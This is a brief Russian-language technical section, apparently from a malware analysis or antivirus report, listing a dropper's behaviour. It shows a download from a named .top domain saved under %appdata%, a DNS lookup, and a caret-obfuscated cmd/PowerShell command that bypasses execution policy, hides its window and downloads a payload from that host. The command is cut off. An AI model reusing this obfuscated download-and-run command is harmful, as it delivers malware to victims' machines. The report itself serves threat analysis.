Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWerSheLl.^Exe ^-EXECUti^O^NPoLIcy BYPa^S^S -^nO^PRofIl^e -winDoW^sT^yL^E^ hID^DEN (NEW-^obj^ECT s^Y^S^T^em^.Ne^t.web^clieNT).D^oWNloA^dfILe('http://www.zonedopesa.top/read.ph...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "P^OWerSheLl.^Exe ^-EXECUti^O^NPoLIcy BYPa^S^S -^nO^PRofIl^e -winDoW^sT^yL^E^ hID^DEN (NEW-^obj^ECT s^Y^S^T^em^.Ne^t.web^clieNT).D^oWNloA^dfILe('http://www.zonedopesa.top/read.ph...' (со скрытым окном)